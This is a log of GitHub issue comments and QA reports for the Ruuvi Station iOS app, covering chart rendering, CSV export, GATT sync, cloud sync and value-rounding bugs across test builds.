[2022-02-18 05:17] markoaamunkajo commented on #591
0.7.7(248) iPhone 7 @priyonto
Can chart be aligned so that the date doesn't cut on the right hand side?

![IMG_8197](https://user-images.githubusercontent.com/50437378/154622039-7f73c6b0-ce2c-4702-bfb7-e992f372d46a.PNG)
![IMG_8196](https://user-images.githubusercontent.com/50437378/154622049-346a6a4d-29a5-434c-a1ae-f3e882845a82.PNG)

[2022-02-18 05:20] markoaamunkajo commented on #253
0.7.7(248) iPhone7, iOS 14.8

Csv export gets stuck in this screen, no way to exit but to kill app.

![IMG_8198](https://user-images.githubusercontent.com/50437378/154622338-4a560226-027e-4bd0-a13d-a2d0c7cd2748.PNG)

[2022-02-18 05:26] markoaamunkajo commented on #490
QA passed

[2022-02-18 05:26] #490 closed

[2022-02-18 06:02] markoaamunkajo opened #744 "0.7.7(248) Chart doesn't draw points to new sensor"
Description:

IPhone 7, iOS 14.8
3.31.1 firmware
Connected mode

User adds new sensor to Ruuvi Station and sets it to Connected mode
Keeps app in foreground, on Charts view
No datapoints are drawn to charts in 30 minutes time

Expected: advertisements/heartbeats should be recorded and chart drawn

![IMG_8200](https://user-images.githubusercontent.com/50437378/154626920-2150cf3d-3405-43b2-91f0-6b28

[2022-02-18 06:10] markoaamunkajo commented on #537
Alerts removed
Update when app opened manually
Save and load from web removed

QA passed

[2022-02-18 06:10] #537 closed

[2022-02-18 06:13] markoaamunkajo commented on #480
QA passed

[2022-02-18 06:13] #480 closed

[2022-02-18 10:23] markoaamunkajo commented on #489
0.7.7(248)
User has one cloud sensor, sets viewport size to 2 days, then disables "Display all data in chart"
Comparing with Android version with same settings something is off with iOS build. The selected unit is inHg for airpressure.

![IMG_2851](https://user-images.githubusercontent.com/50437378/154664260-a239613d-8dec-4740-a17e-9280e17da4ca.JPG)

[2022-02-22 10:23] markoaamunkajo opened #746 "Improve cloud sync queue"
Discuss with Denis about sync queue related to syncing settings changes between app and cloud

[2022-02-22 10:47] priyonto opened #747 "Discussion: Handle iOS bluetooth limitation of connecting one tag to multiple devices"
iOS has a limitation in connecting one tag to multiple devices at the same time. This is currently occurring some confusion among the users when the above-mentioned scenario appears.

[2022-02-22 10:50] priyonto opened #748 "Unify rounding values with Android and WebUI"
The rounding approach of values is not the same as the Android and WebUI. It should be the same and the dissimilarities in the values should be eliminated.
<img width="367" alt="Screenshot 2022-02-22 at 4 48 43 PM" src="https://user-images.githubusercontent.com/24395776/155117420-5b81d0c7-967f-4366-bf72-817532e23280.png">

[2022-02-22 10:54] priyonto opened #749 "Handle cloud syncing in the background when user signed in"
When a user signs in with the verification code, it takes several minutes to sync all the tags and show the homepage. And, if the user goes to the background, and comes back to the foreground the loading spinner gets frozen.

Expected: It should not freeze and should finish the synching and move to the card page.

[2022-02-23 06:46] priyonto opened #750 "Remove/Enhance vertical synchronization behavior of chart"
The charts for temperature, pressure and humidity are vertically and horizontally synced. And right now trying to align a particular property e.g temperature, humidity or pressure chart horizontally affects other properties as well due to the lock behavior.

https://user-images.githubusercontent.com/24395776/155272538-86b44556-8188-4aca-b87a-8328100583d9.MOV

[2022-02-23 08:32] andreevdenis opened #751 "Hide charts for missing sensors (pressure for example)"
![image](https://user-images.githubusercontent.com/24788772/155284581-54c02332-57cf-4e6c-8284-c8165ba2d511.png)
![image](https://user-images.githubusercontent.com/24788772/155284605-a0cf7c25-e755-4d26-853c-c0354b837d22.png)

[2022-02-23 19:01] priyonto opened #753 "Improve timeline for graphs (dates and time)"
Android issue: https://github.com/ruuvi/com.ruuvi.station/issues/241

[2022-02-23 19:07] priyonto opened #754 "Rounding issue when plotting charts (all units)"
The data points storing algorithm is not probably similar to android and it's causing unexpected behavior in charts and showing not showing similar charts.

![154664260-a239613d-8dec-4740-a17e-9280e17da4ca](https://user-images.githubusercontent.com/24395776/155389795-54c6486c-b7c3-4299-87a2-b9224e0ab15a.jpeg)

Expected: The chart should look the same on both apps and iOS should adopt the android a

[2022-02-23 19:12] priyonto commented on #489
I have created a separate issue  (#754) for the above-mentioned problem since that requires more time and attention. I believe the data storing algorithm on iOS is not similar to android. I will investigate this and rectify that.

But, I am moving this card to the QA queue /In review to keep it separate and only focus on tag settings functionalities. @markoaamunkajo

[2022-02-23 19:27] laurijamsa commented on #754
Something weird is going on. If you compare the graphs, only the air pressure graph on iOS is looking like some of its data has been pruned when plotting. Could this be a rounding issue when calculating inHg from the Pascals? Can you reproduce this by using hPa setting?

[2022-02-23 19:31] priyonto commented on #754
Yes, that's a good observation. I also noticed that but I was not sure what is exactly causing this issue. That's why opened this separate card to investigate this with setting up different units.

[2022-02-25 17:10] priyonto opened #755 "Add new metrics in firebase analytics"
Add metrics for users with different firmware.
Metrics to add -
use_df3
use_df4
use_df5

[2022-02-25 20:46] priyonto opened #759 "Check conversions with Android and WebUI"
To make a unified user experience it is essential to show the same value on all the platforms (iOS, Android & WebUI).
Recently an issue (#748) has been discovered where the temperature value was not matching with the Android and WebUI due to a rounding problem. That issue has been rectified, however, double-checking other units are needed as well.

[2022-02-25 20:47] priyonto commented on #759
@markoaamunkajo Would you please do some testing on this? Thank you.

[2022-02-25 21:33] priyonto commented on #710
Fixed on #760

[2022-02-25 21:33] #710 closed

[2022-02-27 00:29] DG12 commented on #751
Looks good to me, only graphs for temperature and humidity on Pro sensor.

Perhaps icon on main card should be suppressed  as well?

[2022-02-27 09:01] priyonto commented on #746
@andreevdenis May I ask you to summarize your approach on the android app regarding this, please? Thank you.

[2022-02-27 10:27] priyonto commented on #605
@andreevdenis How this screen is handled in the android app? Is it showing "Downgrade" instead of the update if the current version is higher than the latest release?

![IMG_5256](https://user-images.githubusercontent.com/24395776/155878676-3ce702f8-ad82-466a-acc3-f2a7c2b26f43.PNG)

[2022-02-27 11:29] andreevdenis commented on #605
No. Update as usual

[2022-02-28 08:51] priyonto commented on #605
Thank you. :)

[2022-02-28 09:55] priyonto commented on #605
This is already taken care of here. If the current release version is not the same as the latest release it is showing the update option. I believe we can close this issue thereby.
https://github.com/ruuvi/com.ruuvi.station.ios/blob/758d7ccae9fb4229f0287798b2a0c91b48b896d0/station/Classes/Presentation/Modules/TagSettings/Submodules/DFU/View/DFUViewModel.swift#L251

[2022-02-28 09:55] #605 closed

[2022-02-28 10:35] priyonto commented on #739
@laurijamsa If a user has for example 5 cards with data format less than 5, are we going to show the popup for all the cards?
For example:
On the card page, I swiped to Card A, show the popup there, user taps Cancel, and swipe right to go to Card B, which is also a tag with DF < 5. Are we going to show the alert again?

[2022-02-28 21:08] andreevdenis commented on #746
My approach here is simple: user shouldn't care if he got troubles with internet or AWS is down when he does some actions in app. If some action in app require to do the same in the cloud we shouldn't show errors to user when he got no Internet. (For example removing sensor require unclaiming it in the cloud)

I've created new table to store network requests in case we need to repeat them.

Fields

[2022-02-28 21:15] andreevdenis commented on #746
We call it "to invent bicycle" among developers in Russia. Not sure if it's international or not. I was trying to find ready to use solution but wasn't successfull

[2022-03-01 10:59] laurijamsa commented on #739
I think yes, we can keep this specification. But let's make this feature it so that we can enable the feature (the popups on <DF5 sensors) remotely, like discussed mutually. And before enabling this, we also decided to see first how many of our users actually have <DF5 sensors in their app.

[2022-03-01 14:49] priyonto commented on #739
Agreed. The plan is to implement this and enable this from remote based on the taken data from analytics.

[2022-03-01 14:51] priyonto commented on #746
Thank you so much @andreevdenis for explaining the workflow. I believe we can do exact same implementation on iOS too. I will ask you though if there's anything when working on it. For now the idea is pretty clear.

[2022-03-02 14:23] JussiKui commented on #725
Any updates on this?

[2022-03-03 02:51] markoaamunkajo commented on #489
OK settings part is QA passed, moving this card to done

[2022-03-03 02:51] #489 closed

[2022-03-03 03:17] markoaamunkajo commented on #253
Build 0.7.7(249)

Export now successful but looks like local sensor with latest firmware is missing a lot of data compared to same sensor on Android. These measurements were GATT synced on iOS.

Left: iOS Right: Android
![Screenshot 2022-03-03 at 10 08 37](https://user-images.githubusercontent.com/50437378/156489302-df4389eb-9037-4c2d-8838-5fb0d9efb765.png)

[2022-03-03 03:29] markoaamunkajo commented on #744
0.7.7(249) Now I see first datapoint in chart within 3 minutes but there are already multiple points in csv

[Ruuvi 319E_20220303-1025.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/8174735/Ruuvi.319E_20220303-1025.csv)
![IMG_8D59E75CCC78-1](https://user-images.githubusercontent.com/50437378/156490604-045078ae-f23b-40b7-a732-059d8060cc60.jpeg)

[2022-03-03 03:30] markoaamunkajo commented on #535
QA passed

[2022-03-03 03:30] #535 closed

[2022-03-03 03:37] markoaamunkajo commented on #591
QA passed

[2022-03-03 03:37] #591 closed

[2022-03-03 03:41] markoaamunkajo commented on #725
Sorry not yet @JussiKui

_One of the three sensors did the same with the IOS handsets.
The situation reset when I went to sync about that sensor on an Android tablet, after that the sync of the iOS handsets started working.

So maybe I wouldn’t just look for a bug in the iOS app._

[2022-03-03 04:12] markoaamunkajo opened #763 "0.7.7(249) Two sensor tag will display third chart after performing GATT sync"
Description:

We made improvement to hide pressure chart from charts view if sensor doesn't exist.
However if I make GATT sync to this sensor the pressure chart appears to view again.
![IMG_8249](https://user-images.githubusercontent.com/50437378/156494805-dac67c78-80e2-4ba6-8308-399ad997a67e.PNG)
![IMG_8248](https://user-images.githubusercontent.com/50437378/156494823-101ad2ac-22b3-45e1-81e2-639e

[2022-03-03 08:26] priyonto commented on #744
While I was working on this part, I noticed that the data points saved and chart data points are not synchronised real time. For example, the data points are being saved let's say each 1 minute. But, if you open chart page after 1 minute the data point will not be visible there. The chart synchronised with a latency. This dissimilarities between chart points and export points is because of this in

[2022-03-03 10:50] laurijamsa commented on #492
This same string you're suggesting cannot be really used instead of the current popup string when user opens the charts first time because they are so different: https://github.com/ruuvi/station.localization/blob/ac50ce7923f82843bd9fa181f054720b4bcffc53/station.localization.json#L213

"This setting enables Bluetooth alerts for this sensor and allows collecting data from sensor locally while app is

[2022-03-03 17:58] priyonto commented on #253
@markoaamunkajo This is happening on the Gatt sync only. And it's reproducible on the app store build as well. I am wondering why. I will investigate it more.

[2022-03-03 17:59] priyonto commented on #744
@markoaamunkajo I have tested it on the app store build and the issue is reproducible on that build too. The chart is updated with a big latency after storing the data in the local database.

[2022-03-03 18:41] priyonto commented on #253
I did a GATT sync on both iOS and Android apps on the same sensor and noticed that the records received from the GATT are missing those values on both apps. I was not aware of this earlier but it seems like we are not receiving these values from the GATT.

[Android.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/8180284/Android.csv)
[iOS.csv](https://github.com/ruuvi/com.ruuvi.station.io

[2022-03-04 12:06] markoaamunkajo commented on #744
@priyonto Yeah I think this is likely an issue that most active users will not notice but new user will be confused about. I cannot remember if this was working differently on much earlier build.

[2022-03-04 12:08] markoaamunkajo commented on #253
@priyonto I'm guessing should consult with @io53 how this can be possible.

[2022-03-04 12:12] priyonto commented on #253
@markoaamunkajo These values are not received from the GATT. @andreevdenis confirmed this yesterday. The only difference I can find in iOS and Android app is - Android app is showing '0' for no values and iOS is showing '-'.

[2022-03-04 12:13] priyonto commented on #744
@markoaamunkajo  Yes, true. The earlier builds also have this same issue. So, I believe we can handle this on the separate card we have since that is is particularly about real-time updating the charts.  That card will be moved up soon.

[2022-03-04 13:00] markoaamunkajo commented on #744
OK moving this to done as duplicate

[2022-03-04 13:00] #744 closed

[2022-03-04 13:09] markoaamunkajo commented on #661
FB19 and AD03 (2.5.9) do not !?

 @DG12 This can be fixed by updating firmware on sensors.

[2022-03-04 13:09] #661 closed

[2022-03-04 13:10] markoaamunkajo commented on #748
QA passed

[2022-03-04 13:10] #748 closed

[2022-03-04 13:13] markoaamunkajo commented on #738
@DG12 Can you try clean install and next version this should not occur again.

[2022-03-04 13:22] markoaamunkajo commented on #759
QA passed

[2022-03-04 13:22] #759 closed

[2022-03-04 13:30] markoaamunkajo commented on #253
OK then it's a known feature, will close this issue

[2022-03-04 13:30] #253 closed

[2022-03-04 16:37] DG12 commented on #661
I really thought that 2.5.9 had graphs before there even was the gateway,
but perhaps I'm thinking of ruuviCollector & grafana.
I will update firmware and post results.

[2022-03-04 17:03] DG12 commented on #738
IOS: logged on as dg@cccu.us, removed, added (no problem)
Shared to dgerman@real-World-Systems.com
dgerman@real-world-systems.com used devastation successful.
IOS remove, add, claim OK  (sharing severed as it should be)
remove, add, claim. dg@cccu.us  devastation  good.
closed

[2022-03-04 22:25] DG12 commented on #686
As of 0.7.7 (250) can not duplicate. closing

[2022-03-04 22:25] #686 closed

[2022-03-05 03:02] markoaamunkajo commented on #763
QA passed

[2022-03-05 03:02] #763 closed

[2022-03-05 03:12] markoaamunkajo commented on #492
QA passed

[2022-03-05 03:15] markoaamunkajo commented on #492
0.7.7(250) Isn't supposed to be shown if sensor fw is 2.5.9 (it is not connectable)

[2022-03-05 03:18] markoaamunkajo commented on #594
0.7.7(250) for 2.5.9 sensor this shows "-" because fw version cannot be read. Maybe it should show Legacy version or Please update @laurijamsa what do you think? Incentive for user to update.

[2022-03-05 03:18] markoaamunkajo commented on #755
Nothing for QA. Moving to done.

[2022-03-05 03:20] markoaamunkajo commented on #751
0.7.7(250) We should also hide Offset Correction for missing sensor, this is currently visible in Sensor Settings

[2022-03-05 17:24] DG12 commented on #556
Haven't seen this in a long time.

[2022-03-05 17:24] #556 closed

[2022-03-05 18:25] DG12 commented on #347
I haven't seen this in. a while.

[2022-03-05 18:25] #347 closed

[2022-03-07 07:10] laurijamsa commented on #594
Yeah that's a good idea. I think it could say on Android and iOS simply: "Very old" "Fin: Hyvin vanha" and because under this string there is a button to initiate updating, everyone will understand what to do.

[2022-03-07 07:11] priyonto commented on #594
Sounds good to me. Thank you.

[2022-03-08 06:42] priyonto commented on #538
I am not sure whether this issue still persists.
@markoaamunkajo Would you please try to reproduce it? Thank you.

[2022-03-08 21:08] DG12 commented on #711
Requiring a gateway to have access to more than 10 days for graphing or export seems unnecessary.

[2022-03-09 02:50] markoaamunkajo commented on #492
QA passed

[2022-03-09 02:50] #492 closed

[2022-03-09 02:52] markoaamunkajo commented on #594
QA passed

[2022-03-09 02:52] #594 closed

[2022-03-09 02:56] markoaamunkajo commented on #751
Sorry I still spotted it in CSV export and it's showing -0.01. I'm guessing we should either remove this column or show "-" instead @laurijamsa ?

[2022-03-09 03:00] markoaamunkajo commented on #751
[Ruuvi 636A_20220309-0953.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/8211302/Ruuvi.636A_20220309-0953.csv)

[2022-03-09 03:01] markoaamunkajo commented on #711
Reproduced, this is a RuuviTag Pro.

[Ruuvi 636A_20220309-0953.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/8211310/Ruuvi.636A_20220309-0953.csv)

[2022-03-09 03:09] markoaamunkajo commented on #653
QA passed

[2022-03-09 03:09] #653 closed

[2022-03-09 03:17] markoaamunkajo commented on #538
Reproduced on iOS 14.8, 0.7.7(252) fw 3.31.1 local sensor with user logged in to Ruuvi Cloud. Flicking the switch doesn't do anything. Killing app fixes this issue.

https://user-images.githubusercontent.com/50437378/157365756-ce01c2e9-2270-45c3-b4b5-96ae7c92d742.mov

![IMG_8286](https://user-images.githubusercontent.com/50437378/157365788-426df270-b782-4550-917e-d62b32959d75.PNG)

[2022-03-09 03:22] markoaamunkajo commented on #725
This could be related reason to this. However I didn't reproduce it second time yet.
https://github.com/ruuvi/com.ruuvi.station.ios/issues/538

[2022-03-09 12:49] laurijamsa commented on #751
Removing the column sounds good to me. Make sure that Android and iOS will behave the same.

[2022-03-09 12:52] priyonto commented on #751
I have used '-' in the current build to keep it similar to other fields with empty values on iOS. But, on android empty values show as '0'.
We have to either make iOS '0' or android to '-' if we want to make it similar.

[2022-03-09 12:54] andreevdenis commented on #751
I vote for showing empty value instead of hiding column. Changing columns count may interrupt some logic that users have: they may upload these csv's somewhere.

[2022-03-09 12:55] priyonto commented on #751
I agree with this.

[2022-03-09 13:26] laurijamsa commented on #751
Yes it is a good point. It is all right to keep it there but fix the values.

[2022-03-09 14:17] markoaamunkajo commented on #711
QA passed

[2022-03-09 14:17] #711 closed

[2022-03-09 14:20] markoaamunkajo commented on #751
"-" used in iOS and GATT synced data also showing this for pressure, QA passed.

[2022-03-09 14:20] #751 closed

[2022-03-10 06:39] markoaamunkajo commented on #738
0.7.7(254) TF Clean install
iPhone 7, iOS 14.8, sensor B7.1 fw 3.31.1 df5

User added one local sensor and logged into cloud bringing 3 more sensors from cloud.

Trying to add a specific sensor locally will now give me SQL error as reported before. This same sensor is already added to Ruuvi Station on iPhone and Android via cloud.

Sensor name includes scandic letters. Name: Öljylämmitin

[2022-03-10 07:26] markoaamunkajo commented on #738
https://user-images.githubusercontent.com/50437378/157610182-d33da8c5-16ca-49b0-a52d-7119d127076c.mp4

[2022-03-10 08:05] priyonto commented on #738
Thank you for the reproduction steps. @markoaamunkajo

[2022-03-10 14:50] andreevdenis opened #782 "Add use_df2 to Firebase analytics"

[2022-03-15 11:12] #54 closed

[2022-03-15 11:13] #229 closed

[2022-03-15 11:14] laurijamsa commented on #252
Closing. Please reopen if you can still reproduce with the latest testflight build.

[2022-03-15 11:14] #252 closed

[2022-03-15 11:18] laurijamsa commented on #173
Let's try to replicate. If cannot, close.

[2022-03-15 11:23] laurijamsa commented on #327
Closing as we've plans of not deprecating the virtual sensor feature later in the future and not making it better than it's already.

[2022-03-15 11:23] #327 closed

[2022-03-15 11:25] laurijamsa commented on #175
Assigning to Marko to check and provide a better spec. If not valid anymore in the latest build, close.

[2022-03-15 11:27] laurijamsa commented on #555
I believe this is fixed in the latest build. If not, please reopen the issue. Closing.

[2022-03-15 11:27] #555 closed

[2022-03-15 11:38] laurijamsa commented on #259
I believe this is already fixed in the latest build and we're showing the graph icon even if sensor is not advertising as a connectable one. If not, please reopen.

[2022-03-15 11:38] #259 closed

[2022-03-15 11:51] laurijamsa commented on #411
I'm not so sure if it is worth to add such logics without knowing if anyone actually even had these issues. And if adding on iOS, should add also to Android. Assigning to Marko. Please try to reproduce these problems on iOS and Android and share your thoughts after.

[2022-03-15 11:53] laurijamsa commented on #548
I believe we already removed the y-axis numbers from the right hand side and I believe this is not a problem anymore. Closing.

[2022-03-15 11:53] #548 closed

[2022-03-15 11:59] laurijamsa commented on #651
I'm closing this as this seems not to be a bug in the iOS app.

[2022-03-15 11:59] #651 closed

[2022-03-15 12:01] laurijamsa commented on #472
We have agreed not to do this at this time as it's not supported by the standard unit library thingy provided by Apple SDK. Closing.

[2022-03-15 12:01] #472 closed

[2022-03-15 12:05] laurijamsa commented on #732
I experienced this too and it's not a good user experience. Let's make the view to scroll when keyboard is open and button is not visible OR make the return button to trigger the sharing.

[2022-03-15 12:14] laurijamsa commented on #724
Usability of the RSSI alert is actually pretty bad on Android and it can easily give false alarms. Working principle on the "when connected" alarm is better but I have doubts if it has ever worked really well with the sensors. Possibly this (and RSSI alert on the Android) are features that could be deprecated at some point in the future. Keeping this issue in the backlog as a reminder for now but

[2022-03-15 12:17] #652 closed

[2022-03-15 12:21] laurijamsa commented on #741
I believe this is not valid in the latest build anymore because it includes an enhanced support for those sensor that have no all sensors on board. Assigning to Marko to recheck. Please close if not valid anymore.

[2022-03-15 12:29] priyonto commented on #732
Yes, I agree. This is not good user experience.

[2022-03-15 12:30] laurijamsa commented on #654
The mobile apps store locally only 10 days of data but maybe Android stores the latest datapoint additionally in some cache and for this reason the 54 days old datapoint is shown on Android but not on iOS. @andreevdenis could you please confirm if this is the case? And is it so that iOS shows no data at all if latest datapoint is over 10 days old? Caching the latest point somewhere else makes sens

[2022-03-15 13:12] andreevdenis commented on #654
For optimisation purposes we got 2 separate tables to store values:
 - one latest measurement for each sensor (we show it in the website card or in sensor settings)
- 10 days history (for charts)

So even if the history table is empty for a specific sensor we still will have the latest measurement in another table.

[2022-03-15 21:03] andreevdenis opened #793 "Delay when opening sensor settings"
I've tried version 255 and it looks like getting firmware version can be improved. I've noticed that when you open settings for the first time app tries to get fw version and user have to wait for it - I can see a full screen progress. It may be very brief delay when the tag is on the table near to you. But usually sensors located around user houses somewhere. In my case it can take up to 5 second

[2022-03-15 21:11] priyonto commented on #793
@andreevdenis Thank you for reporting it. Yes, I am aware of these cases, and I have already addressed almost everything I believe on the current build(256) pushed for the QA.  However, I will still have to check on how it's doing when the tag is far away. I could not test it with extreme cases since my apartment is not much big. But, I would appreciate it if you could check the build 0.7.7(256) w

[2022-03-15 21:14] #782 closed

[2022-03-16 00:55] laurijamsa commented on #753
A user feedback (build 0.7.7 255)

![image](https://user-images.githubusercontent.com/1311912/158495830-6cb724e9-33c0-44ef-ab81-6c66a5e666d5.png)

[2022-03-16 01:18] laurijamsa opened #794 "Feedback cannot be sent"
User report (0.7.7 255):

![image](https://user-images.githubusercontent.com/1311912/158497041-a105d63c-7cc8-47f3-8739-29d6f5ee4d1c.png)

I tried the same build with my iPhone SE (iOS 15.3.1):

First what happened was this:

![image](https://user-images.githubusercontent.com/1311912/158497443-ba318301-9a47-4b74-a405-4e312d5ab3cc.png)

Then I installed Gmail and logged in and checked that Gmail is

[2022-03-16 03:26] laurijamsa commented on #747
In the meeting we discussed that there is a chance that firmware broadcasts one false "connectable" advertisement after already connected to a phone. And this may confuse another phone(s) that may would like to connect to the sensor as they think that a sensor is connectable even if it's not (because another phone already is connected with it). We agreed that a quick fix for this could be to wait

[2022-03-16 03:36] laurijamsa commented on #175
iOS currently:
![image](https://user-images.githubusercontent.com/1311912/158511213-848f8f88-00dd-4a6f-a911-ecfc7015eb9a.png)
![image](https://user-images.githubusercontent.com/1311912/158511230-d062ca60-20fd-41a2-8c27-966d6ba1b91a.png)
Android:
![image](https://user-images.githubusercontent.com/1311912/158511380-2722f328-75f8-4315-8408-14743e11e1dc.png)

Let's unify this a bit more with Android.

[2022-03-16 07:09] priyonto commented on #175
You are right. Radio buttons are not natively available on iOS. However it can be done I believe with some tweaks and customization. Checkbox are available default but on the right side.

[2022-03-16 07:12] priyonto commented on #753
Thank you for reporting. I believe it is showing 48 hours data on the chart. However, the x-axis date time label is causing the confusion since it is showing six minutes less. I will investigate to improve this UX.

[2022-03-16 09:11] andreevdenis commented on #175
In my opinion it's better to respect platform specifics.

[2022-03-16 10:50] priyonto commented on #747
@markoaamunkajo
Would you please try to reproduce the unusual behaviors we have talked about in the meeting? I have tried to reproduce it on the current dev build (256) and suddenly everything is working as expected and no unusual behavior also faced. The only thing I noticed is even though tag is not connectable the connection section on the tag settings is visible. I believe if the tag is not co

[2022-03-16 11:39] andreevdenis commented on #793
looks like fixed in 256

[2022-03-16 11:39] #793 closed

[2022-03-16 13:07] priyonto commented on #747
I have made some improvements and am hopeful these changes will make the user experience better.

[2022-03-16 13:42] markoaamunkajo commented on #538
0.7.7(256) Reproduced
https://user-images.githubusercontent.com/50437378/158603062-d09f3779-8f1d-49b3-87dc-585c7e507a3c.mov

[2022-03-16 14:05] markoaamunkajo commented on #538
@priyonto Perfectly normal for me ha!
I see Connected forever if I flick the switch like I do so user has possibility to set it like this by accident, which should be avoided. If it was able to resolve itself over period of time then this case would be dismissed. Ideas?

[2022-03-16 14:10] markoaamunkajo commented on #538
That sounds like a good and straightforward plan to me.

[2022-03-16 14:11] priyonto commented on #538
Thank you. I will try to implement that.

[2022-03-16 14:30] markoaamunkajo commented on #601
@priyonto It looks like it's possible that some strings might be missing.

![photo_2022-03-16 21 26 23](https://user-images.githubusercontent.com/50437378/158612533-380a7e22-682a-468a-a95a-2668214c416e.jpeg)

[2022-03-16 14:50] markoaamunkajo commented on #569
QA passed

[2022-03-16 14:50] #569 closed

[2022-03-16 18:46] DG12 commented on #627
version 0.7.7(256)
Worse  , All sensors now removed when logging out from cloud even those being updated  by bluetooth
![Logout-remove-all](https://user-images.githubusercontent.com/2365961/158664484-75684739-352c-425f-ac7c-a01268fbf6ab.jpeg)
.

[2022-03-16 19:08] DG12 opened #798 "sign in login screen nits 0.7.7(2560"
color:black Sign in
color:white Login to
font-family:?? Ruuvi. S.B rUUVi   ??
Station

... existing Ruuvi account

![login-signin](https://user-images.githubusercontent.com/2365961/158667767-396e4852-294f-41b0-85c4-1fd3ce396c3f.PNG)

[2022-03-16 19:13] DG12 opened #799 "After signout all sensors are removed"
Signed in.
Most sensors are updated via Bluetooth.
Sign out.
All sensors are removed. Showing "blank" screen.
Add a "new" sensor. (perhaps "new" should be removed in general)

[2022-03-16 22:33] laurijamsa commented on #799
Thanks for the suggestion. However, I think it is the same on Android, so this is not an iOS issue. Let's open new string suggestions over here: https://github.com/ruuvi/station.localization

[2022-03-16 22:35] #799 closed

[2022-03-16 22:38] laurijamsa commented on #627
If you have claimed ownerships of those sensors that got removed, all is working according to the specification. And same way as on Androidd. Or did the app remove also those offline only sensors that are not owned by you?

[2022-03-17 00:53] laurijamsa commented on #798
We already had an issue about this and it passed QA ok. Its implementation specification was: "unify with Android".  If you find differences with Android or other bugs related to this, please let us know. Closing this one.

The original issue: https://github.com/ruuvi/com.ruuvi.station.ios/issues/480

[2022-03-17 00:53] #798 closed

[2022-03-18 07:38] priyonto opened #802 "Improve the performance of cards screen"
**Current:** A UI glitch/lag is noticed when the app is performing cloud sync in the background.
Build 0.7.7 (257)
Device: iPhone XS Max
iOS: 15.3.1

**Expected:** There should be no lag.

**Reference:**

https://user-images.githubusercontent.com/24395776/158957160-55fadbbc-2c10-4e5c-91d8-52df1b5137e6.MP4

[2022-03-21 01:29] markoaamunkajo commented on #738
QA passed

[2022-03-21 01:32] markoaamunkajo commented on #747
QA passed

[2022-03-21 01:32] #747 closed

[2022-03-21 01:33] markoaamunkajo commented on #601
QA passed

[2022-03-21 01:33] #601 closed

[2022-03-21 01:59] markoaamunkajo commented on #534
QA passed

[2022-03-21 01:59] #534 closed

[2022-03-21 02:10] markoaamunkajo commented on #794
0.7.7(257), ios 15.4.

Looks like Apple has really missed the boat on this one...
Steps:
1. Delete Mail app (because why not)
2. Open Ruuvi Station, Send Feedback
3. Popup shown

![IMG_2863](https://user-images.githubusercontent.com/50437378/159196938-77cd25fd-d8a5-4b07-9bcf-882c3b61aa45.PNG)

[2022-03-21 02:12] markoaamunkajo commented on #704
QA passed

[2022-03-21 02:12] #704 closed

[2022-03-21 02:49] markoaamunkajo commented on #749
QA passed

[2022-03-21 02:49] #749 closed

[2022-03-21 02:51] markoaamunkajo commented on #739
Worked me like a charm. QA passed.

[2022-03-21 02:51] #739 closed

[2022-03-21 03:18] markoaamunkajo commented on #679
0.7.7(257) iOS 15.4.

Looks like sensor is trying to show in new format after updating fw from 2.5.9 but the sensor settings page is stuck somewhere in between. The sensor page itself shows no icon for chart. See video:

https://user-images.githubusercontent.com/50437378/159200880-1d007df6-226d-4190-a1d1-6fabf0fc0d1c.mov

[2022-03-21 06:02] markoaamunkajo opened #805 "0.7.7(257) one shared sensor showing not smooth chart"
0.7.7(257), ios 15.4.

One shared sensor from Elias is showing me not smooth chart, export seems to show different resolution than other sensors.

It's smooth on android and web. It seems like iOS rounds graph values to 0.1 resolution. The temp is relatively stable where that sensors it so that's why you can notice it.

![photo_2022-03-21 13 02 23](https://user-images.githubusercontent.com/5043737

[2022-03-21 07:29] laurijamsa commented on #805
Seems that we already had an issue about this but we just didn't know that it's not only the inHg but with all units. Closing this one as a duplicate.

https://github.com/ruuvi/com.ruuvi.station.ios/issues/754

[2022-03-21 07:29] #805 closed

[2022-03-21 07:39] priyonto commented on #794
@markoaamunkajo
Hmm. Surprisingly I can't reproduce this on my device. Did you select any default mail app on the settings after deleting the Mail app? Something like this?
![IMG_1CFAB2262F2F-1](https://user-images.githubusercontent.com/24395776/159220653-13320700-e745-495d-b9ed-d4b41521f838.jpeg)

[2022-03-21 07:48] laurijamsa commented on #794
I also see Gmail as a default mail app in the settings like told in the previous message. Here's another screenshot of it:

<img width="304" alt="image" src="https://user-images.githubusercontent.com/1311912/159221583-4a95ce49-9727-4056-a978-9a9566520cf2.png">

[2022-03-21 08:20] priyonto commented on #794
@laurijamsa Thanks. Would you please try 257 if you have some time? In my device I can't reproduce it.
iOS 15.4, iPhone 11 Pro Max

[2022-03-21 08:27] markoaamunkajo commented on #794
@priyonto Would you believe if I told you I don't have such setting...

![IMG_2869](https://user-images.githubusercontent.com/50437378/159226216-91c855b8-31c7-4b42-8758-469f5c7fca14.PNG)
![IMG_B64E5BCE90C7-1](https://user-images.githubusercontent.com/50437378/159226229-b4f03a70-cb94-43c5-92cd-5e993651730a.jpeg)

[2022-03-21 08:30] priyonto commented on #794
I get it. That's the reason you are seeing the Mail app popup because setting app "Default" mail app is not supported on your device!!! What device you are on?

[2022-03-21 08:33] markoaamunkajo commented on #794
@priyonto iPhone 6 Plus

[2022-03-21 08:36] priyonto commented on #794
iPhone 6 Plus is not compatible with iOS 13 or above. The default email app setting is available for iOS 14 and above. Devices with iOS 13 or less must have Mail app installed to open email link.

[2022-03-21 08:37] priyonto commented on #794
@markoaamunkajo
I think you mentioned you are on iOS 15.4! How are you on iOS 15.4 with iPhone 6 Plus? Or it is 6s Plus?

[2022-03-21 08:39] markoaamunkajo commented on #794
You are right it's actually 6s Plus @priyonto

[2022-03-21 08:45] priyonto commented on #794
@markoaamunkajo Then it should show the Default Mail App setting automatically. I am not sure whether it is device-specific or anything but as far I knew it should be available on devices with iOS 14 and above.

[2022-03-21 08:46] markoaamunkajo commented on #794
@priyonto yes I see the setting on my iPhone 7 and iOS 14.8

[2022-03-21 08:49] priyonto commented on #794
I believe so. But, is the default mail app opening when you tap feedback on your iPhone 7?

[2022-03-21 08:56] markoaamunkajo commented on #794
@priyonto Gmail is selected as default mail app:
![feedback_iPhone7](https://user-images.githubusercontent.com/50437378/159230107-699bf05a-304e-43aa-8399-2183484a9314.jpg)

[2022-03-21 08:58] priyonto commented on #794
@markoaamunkajo Are you checking on the test flight version? This is fixed on build 257, not TF.

